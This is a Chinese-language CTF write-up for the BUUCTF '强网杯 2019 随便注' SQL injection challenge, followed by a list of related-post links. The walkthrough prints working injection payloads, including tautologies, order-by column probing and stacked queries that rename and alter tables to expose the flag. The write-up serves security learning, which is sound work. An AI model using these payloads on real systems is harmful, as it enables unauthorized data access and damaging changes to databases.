【BUUCTF】[强网杯 2019]随便注 1
这是一个典型的sql注入题目
知识点:
1、注入点检测
2、万能匹配
3、暴力获得数据表和其属性
4、sql语句的掌握(order by; union select; rename table; alter table…等等)
1、进入网站
2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况
经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示
3、测试是否存在注入
and 1=1和and 1=2没有变化
在参数后面加单引号,发现错误,可以尝试进行注入
4、尝试0‘ or ‘1’='1;0" or “1”="1等,发现可行
5、尝试order by+数字,直至返回错误,获得表中的列树;#号用来注释掉后面的命令
1’ order by 2#
2’ order by 3#
发现3的时候报错,所以表中只有两列数据
6、联合查询,发现select等操作被过滤
1’ union select 1,2
7、获取表名,发现有两个表
0’; show tables;#
8、获取表中的列名,发现被查询的是words表,而flag在另一个表中,我们需要获取其中的饿内容
0'; show columns from words;#
0'; show columns from `1919810931114514`;#
9、更改表名列名(偷天换日)
因为查询是在words中查询id的,所以我们将表1919810931114514改名为words,将words改名为其余的名字。同时将flag属性改名为id属性,类型为varchar(100)
0';rename table `words` to words2;rename table `1919810931114514` to words;alter table words change flag id varchar(100);show tables;#
10、查看改之后的words表中的所有内容获得flag
1’ or ‘1’='1
【BUUCTF】[强网杯 2019]随便注 1相关推荐
- buuctf [强网杯 2019]随便注 1
buuctf web [强网杯 2019]随便注 1 -刷题个人日记 小白一个,写给自己看. 打开后是这样. 从题目和内容来看就是一道sql注入题. 输入 1' or 1=1;# 这个#用来注释掉后面 ...
- BUUCTF [强网杯 2019]随便注
题目 打开环境发现是经典的提交界面 老规则还是查询注入点,1 or 1 =1#,1' order by 1#都未出错,但是1' union select 1,2#是出现了错误,发现一些查询语句被过滤了 ...
- BMZCTF 强网杯 2019 随便注 原理+题解
目录 知识点 堆叠注入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠注入 堆叠查询注入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开.而堆叠查询注入攻击就 ...
- BUUCTF Web [强网杯 2019]随便注
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
- 强网杯 2019]随便注 【SQL注入】四种解法
题目简介 题目名称:[强网杯 2019]随便注 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL注入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = ...
- [强网杯 2019]随便注 —— 堆叠注入
[强网杯 2019]随便注 前言 个人观点,若有误请指教 解题思路及步骤 直接上'引号,结果直接报错了,证明存在sql注入漏洞. 判断当前表 ...
- [强网杯 2019]随便注 1
题目[强网杯 2019]随便注 1 题目来源:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4% ...
- 【BUUCTF】强网杯 2019随便注1 write up
输入万能密码1' or 1=1# ,判断存在sql注入, SQL注入的万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账号也可以登录后台. 万能密码原理: 万能密码能够绕过sql检测,在 ...
- (二)强网杯2019[随便注]
堆叠注入学习(堆叠查询,Stacked Queries) 堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句. 堆叠注入原理 在 ...
最新文章
- 源码阅读:AFNetworking(八)——AFAutoPurgingImageCache
- Unity GUI(uGUI)使用心得与性能总结
- 嵌入式Web Service gSOAP的移植与应用(二)
- 最快60秒完成新冠病毒核酸对比 阿里云向社会免费开放基因计算服务
- Nginx反向代理的使用
- C++中string、char[]、char*之间的转换
- C# DataSet转ListDataTable
- Python getattr
- 一些mootools的资源
- Mysql之insert,update,delete
- python如何实现输出表格_python如何以表格形式打印输出
- 产品经理简历简历怎么写_完美的简历
- “APP故障门”频出,移动应用开发到底应该怎么做?
- php 判断某一天是周几,php如何判断一个日期是周几
- PDF打印内容缺失问题解决办法
- 京东登录注册页面的简单实现——(仿)
- 魔方cfop公式软件_【初级篇】(八)最简单的三阶魔方入门教程——顶棱还原...
- 上市公司“掘金”大数据 多领域大数据应用受热捧
- vue2打包兼容ie11白屏报错问题汇总
- 图形和函数图像的绘制
热门文章
- prometheus数据结构和压缩原理讲解
- 项目管理树状组织结构思维导图怎样绘制
- 【Clemetine】基于二项Logistic回归的电信客户流失预测
- sqlserver 2000安装图解教程
- 【 第八节 函数作用域】
- Python Pyside2 Pinger新手QQ音乐网易云酷狗爬虫下载
- 车流量检测实现:多目标追踪、卡尔曼滤波器、匈牙利算法、SORT/DeepSORT、yoloV3、虚拟线圈法、交并比IOU计算
- Struts1.x系列教程:用MyEclipse开发第一个Struts程序
- 2018年刑侦科推理试题php版,2018年刑侦科目推理试题完整版分享
- win10麦克风说话没声音_电脑录屏,真的没那么麻烦